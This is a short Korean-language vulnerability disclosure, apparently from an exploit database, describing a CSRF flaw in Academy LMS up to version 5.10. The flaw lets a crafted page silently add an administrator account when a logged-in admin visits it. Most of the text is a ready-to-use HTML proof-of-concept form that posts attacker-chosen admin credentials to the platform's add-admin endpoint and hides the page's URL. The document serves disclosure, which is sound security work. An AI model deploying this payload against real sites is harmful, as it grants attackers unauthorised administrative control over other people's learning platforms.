
Academy LMS <= 5.10 CSRF
Academy LMS <= 5.10 CSRF
Academy LMS는 사용자가 강좌를 만들고 홍보할 수 있는 애플리케이션입니다. 새로운 관리자 사용자를 추가하는 기능은 CSRF에 취약하여, 사회공학 기법을 통해 플랫폼에서 관리자 액세스 권한을 획득할 수 있습니다.
#개념 증명 (POC) 이 개념 증명의 첫 번째 단계는 관리자 사용자로 플랫폼에 인증하는 것입니다.
그런 다음 취약점 악용 코드가 포함된 페이지에 접속하기만 하면, 새로운 관리자 사용자가 시스템에 추가된 것을 확인할 수 있습니다.
악용에 사용된 코드:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/academy/admin/admins/add" method="POST">
<input type="hidden" name="first_name" value="csrf" />
<input type="hidden" name="last_name" value="vinix" />
<input type="hidden" name="biography" value="<p>csrf poc</p>" />
<input type="hidden" name="files" value="" />
<input type="hidden" name="user_image" value="" />
<input type="hidden" name="email" value="username" />
<input type="hidden" name="password" value="password" />
<input type="hidden" name="facebook_link" value="" />
<input type="hidden" name="twitter_link" value="" />
<input type="hidden" name="linkedin_link" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>